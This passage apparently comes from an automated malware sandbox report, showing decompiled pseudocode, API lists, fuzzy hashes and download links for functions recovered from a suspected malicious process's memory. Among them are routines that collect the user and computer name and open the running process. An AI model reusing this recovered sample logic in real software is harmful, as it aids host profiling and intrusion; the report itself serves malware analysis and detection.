								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x07f72d7b
0x07f72d82
0x07f72d87
0x07f72d8a
0x07f72d91
0x07f72d94
0x07f72d97
0x07f72d9c
0x07f72da1
0x07f72ef5
0x07f72ef7
0x07f72ef9
0x07f72efe
0x07f72efe
0x07f72da7
0x07f72daa
0x07f72dad
0x07f72daf
0x07f72daf
0x07f72db3
0x00000000
0x00000000
0x07f72db7
0x07f72de3
0x07f72de8
0x07f72dea
0x07f72dea
0x07f72ded
0x07f72df0
0x07f72df0
0x07f72df2
0x00000000
0x07f72dbd
0x07f72dbf
0x07f72dde
0x07f72dde
0x07f72df5
0x07f72df5
0x07f72df6
0x07f72df6
0x07f72df9
0x00000000
0x00000000
0x00000000
0x07f72df9
0x07f72dc3
0x07f72e0a
0x07f72e0e
0x07f72ee8
0x07f72eea
0x07f72eea
0x07f72eeb
0x07f72eee
0x00000000
0x07f72eee
0x07f72e17
0x07f72e28
0x07f72e2c
0x07f72ee4
0x00000000
0x07f72ee4
0x07f72e32
0x07f72e35
0x07f72e39
0x07f72e3d
0x07f72e42
0x07f72eda
0x07f72eda
0x00000000
0x07f72ee0
0x07f72e4d
0x07f72e56
0x07f72e6a
0x07f72e71
0x07f72e86
0x07f72e8c
0x07f72e94
0x00000000
0x00000000
0x00000000
0x00000000
0x07f72e96
0x07f72e96
0x07f72e96
0x07f72e9d
0x07f72ea5
0x00000000
0x00000000
0x07f72ea7
0x07f72eb0
0x00000000
0x00000000
0x00000000
0x07f72eb2
0x07f72eb4
0x07f72eb7
0x07f72eb7
0x07f72eba
0x07f72ebe
0x07f72ec1
0x07f72ec7
0x07f72eca
0x07f72ed1
0x00000000
0x07f72e4d
0x07f72dc8
0x07f72dd0
0x07f72dd6
0x07f72dd8
0x07f72dd8
0x07f72ddb
0x07f72ddd
0x00000000
0x07f72ddd
0x07f72db7
0x07f72dfd
0x07f72e02
0x07f72e04
0x07f72e04
0x07f72e07
0x07f72e07
0x00000000

APIs

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

lstrcpy.KERNEL32(69B25F45,00000020), ref: 07F72E71
lstrcat.KERNEL32(69B25F45,00000020), ref: 07F72E86
lstrcmp.KERNEL32(00000000,69B25F45), ref: 07F72E9D
lstrlen.KERNEL32(69B25F45), ref: 07F72EC1

Strings

, xrefs: 07F72E0A

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 12e412987536a096dd04fc700e119a20ffb6b2412a857168b18f5235184aedae
Instruction ID: 0e00be20529506d3c53dc6fbec2488b33c66202a6163e5ee182b2fc206966fbc
Opcode Fuzzy Hash: 12e412987536a096dd04fc700e119a20ffb6b2412a857168b18f5235184aedae
Instruction Fuzzy Hash: 5A51B2B2E00109EBDF25CF99C884BADBBB5FF55315F19806BE8159B201C770EA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07F79267, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F79267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E07F71525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E07F78B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x7f79cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x07f79275
0x07f79278
0x07f7927b
0x07f79281
0x07f79286
0x07f7928c
0x07f79294
0x07f79297
0x07f7929d
0x07f792a2
0x07f792af
0x07f792bc
0x07f792c0
0x07f792c2
0x07f792c6
0x07f792c9
0x07f792d9
0x07f7932c
0x07f7932d
0x07f792db
0x07f792e0
0x07f792e1
0x07f792e6
0x07f792e9
0x07f792fc
0x00000000
0x07f792fe
0x07f79301
0x07f79306
0x07f79314
0x07f79317
0x07f7931d
0x07f79322
0x00000000
0x07f79324
0x07f79324
0x07f79327
0x07f79327
0x07f79322
0x07f792fc
0x07f79332
0x07f79333
0x07f792a2
0x07f79339

APIs

GetUserNameW.ADVAPI32(00000000,07F79CB0), ref: 07F7927B
GetComputerNameW.KERNEL32(00000000,07F79CB0), ref: 07F79297

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

GetUserNameW.ADVAPI32(00000000,07F79CB0), ref: 07F792D1
GetComputerNameW.KERNEL32(07F79CB0,?), ref: 07F792F4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,07F79CB0,00000000,07F79CB2,00000000,00000000,?,?,07F79CB0), ref: 07F79317

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 0d1bb6028c372387bd3d78e397a2b409eb678eefc09a6921a25e0d5eff8770ad
Instruction ID: 502377f6c2ca27e3a24694ee8b6802bac8acaad3bd616ea0497f7b1f1656a032
Opcode Fuzzy Hash: 0d1bb6028c372387bd3d78e397a2b409eb678eefc09a6921a25e0d5eff8770ad
Instruction Fuzzy Hash: 7F2108B6D00209FFDB11DFE8D985CEEBBBCEF44204B5444AAE606E7240D674AB05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EB452A0, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EB452B8

Part of subcall function 6EB35039: RtlFreeHeap.NTDLL(00000000,00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB3504F
Part of subcall function 6EB35039: GetLastError.KERNEL32(00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB35061

_free.LIBCMT ref: 6EB452CA
_free.LIBCMT ref: 6EB452DC
_free.LIBCMT ref: 6EB452EE
_free.LIBCMT ref: 6EB45300

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f143751bfe5f62dbdc2f98d1cb57b9c0baa537dc6c65233546f7a55e39c25ba4
Instruction ID: 12c257dfea447168fafcbceb46a668c5bdf35e2cc4e7df8080cd879a3f6df10b
Opcode Fuzzy Hash: f143751bfe5f62dbdc2f98d1cb57b9c0baa537dc6c65233546f7a55e39c25ba4
Instruction Fuzzy Hash: 46F0AF31522AA69BCA65CED4E291C4A3BFDEA407503604C0EE059D7404DB30F8819AAC

Uniqueness

Uniqueness Score: -1.00%

Function 07F79EBB, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F79EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x7f7d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x7f7d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x7f7d258 = _t6;
					 *0x7f7d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x7f7d254 = _t7;
					if(_t7 == 0) {
						 *0x7f7d254 =  *0x7f7d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x07f79ec3
0x07f79ec9
0x07f79ed0
0x00000000
0x07f79f2a
0x07f79ed2
0x07f79eda
0x07f79ee7
0x07f79ee7
0x07f79f27
0x00000000
0x07f79f27
0x07f79ee9
0x07f79ee9
0x07f79eee
0x07f79f00
0x07f79f05
0x07f79f0b
0x07f79f11
0x07f79f18
0x07f79f1a
0x07f79f1a
0x00000000
0x07f79f21
0x07f79ee3
0x00000000
0x00000000
0x07f79ee5
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,07F727C3,?,?,00000001,?,?,?,07F77F25,?), ref: 07F79EC3
GetVersion.KERNEL32(?,00000001,?,?,?,07F77F25,?), ref: 07F79ED2
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,07F77F25,?), ref: 07F79EEE
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,07F77F25,?), ref: 07F79F0B
GetLastError.KERNEL32(?,00000001,?,?,?,07F77F25,?), ref: 07F79F2A

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: f9a7f75bf2639815aec5f36545a9f0fb935de56cf12e1d42ba04fc026a909608
Instruction ID: 807f1c61ebfef34bc534f9118f25986c28e0156c925605dffddb3b34909c1e84
Opcode Fuzzy Hash: f9a7f75bf2639815aec5f36545a9f0fb935de56cf12e1d42ba04fc026a909608
Instruction Fuzzy Hash: 43F0AFB0B5430A9BD720CF34AC1BB593BA5AB4170EF54051BE553C63C0E7B8E002CB25

Uniqueness

Uniqueness Score: -1.00%

Function 6EA60CE0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20timeCOMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(6ED19370,6EA6708C,6ED19454,6EA2F415), ref: 6EA60D0C
QueryPerformanceCounter.KERNEL32(6ED19368), ref: 6EA60D21
timeGetTime.WINMM ref: 6EA60D32

Strings

SDL_TIMER_RESOLUTION, xrefs: 6EA60CF0

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterFrequencyTimetime
String ID: SDL_TIMER_RESOLUTION
API String ID: 2195385177-587407577
Opcode ID: c8e0f434262bda94451832319c783731145526ef25d243dddb5e3014b350f32a
Instruction ID: b0efaad69541737d5cc3dfb1e0b2a91b150ee95d8e480df076a158888fd33d1d
Opcode Fuzzy Hash: c8e0f434262bda94451832319c783731145526ef25d243dddb5e3014b350f32a
Instruction Fuzzy Hash: C6E01AB0C24A44DEFF549FA8A64A7887BB4BB07319F040104F005967C0E7702186DF09

Uniqueness

Uniqueness Score: -1.00%

Function 07F7137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 07F713B6
SysFreeString.OLEAUT32(00000000), ref: 07F7149B

Part of subcall function 07F74E05: SysAllocString.OLEAUT32(07F7C290), ref: 07F74E55

SafeArrayDestroy.OLEAUT32(00000000), ref: 07F714EE
SysFreeString.OLEAUT32(00000000), ref: 07F714FD

Part of subcall function 07F752B9: Sleep.KERNEL32(000001F4), ref: 07F75301

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 81bb23693cce6b14a6392c999c7f1d4e7bbe847eb2649c56fae00a1274752480
Instruction ID: 93b68be02b3f96311bbdb310714a62b6d5c7a85e74a4a411024e6bbc06e2546a
Opcode Fuzzy Hash: 81bb23693cce6b14a6392c999c7f1d4e7bbe847eb2649c56fae00a1274752480
Instruction Fuzzy Hash: 7E514FB690060DAFDB11CFA8C845A9EB7B5FFC9710B288469E505DB310EB75DD09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07F74E05, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E07F74E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x7f7d2a8; // 0xaaa5a8
					_t5 = _t103 + 0x7f7e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x7f7c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x7f7d2a8; // 0xaaa5a8
												_t28 = _t109 + 0x7f7e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x7f7d2a8; // 0xaaa5a8
														_t33 = _t79 + 0x7f7e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x07f74e0a
0x07f74e13
0x07f74e14
0x07f74e18
0x07f74e1e
0x07f74e24
0x07f74e2d
0x07f74e33
0x07f74e3d
0x07f74e3f
0x07f74e45
0x07f74e4a
0x07f74e55
0x07f74e5b
0x07f74e60
0x07f74f82
0x07f74e66
0x07f74e66
0x07f74e73
0x07f74e79
0x07f74e7f
0x07f74e83
0x07f74e89
0x07f74e96
0x07f74e9a
0x07f74ea0
0x07f74ea3
0x07f74eab
0x07f74eac
0x07f74eb0
0x07f74eb4
0x07f74eb7
0x07f74eba
0x07f74ec0
0x07f74ec9
0x07f74ecf
0x07f74ed0
0x07f74ed3
0x07f74ed4
0x07f74ed5
0x07f74edd
0x07f74ede
0x07f74edf
0x07f74ee1
0x07f74ee5
0x07f74ee9
0x00000000
0x00000000
0x07f74eef
0x07f74ef8
0x07f74efe
0x07f74f08
0x07f74f0c
0x07f74f0e
0x07f74f1b
0x07f74f1f
0x07f74f27
0x07f74f2c
0x07f74f3e
0x07f74f40
0x07f74f46
0x07f74f46
0x07f74f4f
0x07f74f4f
0x07f74f51
0x07f74f57
0x07f74f57
0x07f74f5a
0x07f74f60
0x07f74f63
0x07f74f6c
0x00000000
0x00000000
0x00000000
0x07f74f6c
0x07f74ec0
0x07f74eba
0x07f74ea3
0x07f74f72
0x07f74f72
0x07f74f78
0x07f74f78
0x07f74f7e
0x07f74f7e
0x07f74f87
0x07f74f8d
0x07f74f8d
0x07f74e4a
0x07f74f96

APIs

SysAllocString.OLEAUT32(07F7C290), ref: 07F74E55
lstrcmpW.KERNEL32(00000000,0076006F), ref: 07F74F36
SysFreeString.OLEAUT32(00000000), ref: 07F74F4F
SysFreeString.OLEAUT32(?), ref: 07F74F7E

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 68fe88696b8148b5e3b3c648e6a3aa98a98618e19d5efcc56815af28b56ec5a0
Instruction ID: 18eb3012271d4f8c6e6b9e064a083968d7f186a26433744faa5d081e18b4fc7d
Opcode Fuzzy Hash: 68fe88696b8148b5e3b3c648e6a3aa98a98618e19d5efcc56815af28b56ec5a0
Instruction Fuzzy Hash: E7513BB5D00509EFCB01DFA8C888DEEF7B9EF89705B144599E925EB210D731AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07F729ED, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E07F729ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E07F78B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E07F74AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E07F72F01(_t101,  &_v236, _a8, _t96 - _t81);
					E07F72F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E07F74AA4(_t101, 0x7f7d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E07F74AA4(_a16, _a4);
						E07F728BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L07F7AF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L07F7AF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E07F79947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E07F74506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E07F7A708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x7f7d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x07f729f0
0x07f729fc
0x07f72a02
0x07f72a07
0x07f72a0b
0x07f72b68
0x07f72b6c
0x07f72b6c
0x07f72a11
0x07f72a15
0x07f72a19
0x07f72a1c
0x07f72a27
0x07f72a2d
0x07f72a32
0x07f72a35
0x07f72a4f
0x07f72a5b
0x07f72a64
0x07f72a6e
0x07f72a73
0x07f72a75
0x07f72a78
0x07f72b26
0x07f72b2c
0x07f72b3d
0x07f72b50
0x07f72b60
0x00000000
0x07f72b65
0x07f72a81
0x07f72a88
0x07f72a8c
0x07f72a92
0x07f72a94
0x07f72a96
0x07f72a98
0x07f72a9a
0x07f72aa4
0x07f72aa9
0x07f72aab
0x07f72aad
0x07f72aae
0x07f72aaf
0x07f72ab0
0x07f72ab7
0x07f72abe
0x07f72ac1
0x07f72ac1
0x07f72a8e
0x07f72a8e
0x07f72a8e
0x07f72ac9
0x07f72ad1
0x07f72ada
0x07f72adf
0x07f72adf
0x07f72ae4
0x00000000
0x00000000
0x07f72ae6
0x07f72ae9
0x07f72af3
0x00000000
0x00000000
0x07f72af5
0x07f72af5
0x07f72aff
0x07f72adf
0x07f72ae4
0x00000000
0x00000000
0x00000000
0x07f72ae4
0x07f72b09
0x07f72b0c
0x07f72b0f
0x07f72b16
0x07f72b16
0x07f72b23
0x00000000
0x07f72b23
0x07f72a1e
0x07f72a22
0x07f72a23
0x07f72a25
0x00000000
0x00000000
0x00000000
0x07f72a25
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 07F72A9A
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 07F72AB0
memset.NTDLL ref: 07F72B50
memset.NTDLL ref: 07F72B60

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: d0c0b0e3762e58834091f4fbd634ac5926c7db047dfd43faa05b43e705524662
Instruction ID: 574f24785d7791b8f15638a642af08acc28b28be8f32a3a0e2ad685411c28f29
Opcode Fuzzy Hash: d0c0b0e3762e58834091f4fbd634ac5926c7db047dfd43faa05b43e705524662
Instruction Fuzzy Hash: 704172B1A00259EBEB20DFA8CC40FEE77B5FF45720F18852AF915AB180DB709A55CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07F75988, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E07F75988(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
